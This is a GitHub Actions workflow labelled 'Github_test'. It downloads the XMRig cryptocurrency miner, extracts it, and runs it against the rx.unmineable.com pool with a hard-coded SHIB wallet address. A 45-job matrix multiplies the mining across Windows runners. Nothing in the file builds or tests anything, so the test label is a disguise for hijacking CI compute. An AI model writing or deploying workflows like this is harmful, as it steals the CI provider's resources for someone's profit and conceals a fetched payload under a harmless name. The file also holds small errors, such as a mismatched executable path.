name: Github_test
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: ZN
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.11.1/xmrig-6.11.1-msvc-win64.zip -OutFile xmrig-6.11.1-msvc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.11.1-msvc-win64.zip
    - name: RUNNING
      run: .\xmrig-6.11.1-msvc-win64\xmrig-6.11.11\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -p x -t 1 -u SHIB:0x9f6B4576B8F647D0F9f5880ba5F2524bF69f16a1.Z1_Alpha
    - name: DONE
      run: exit
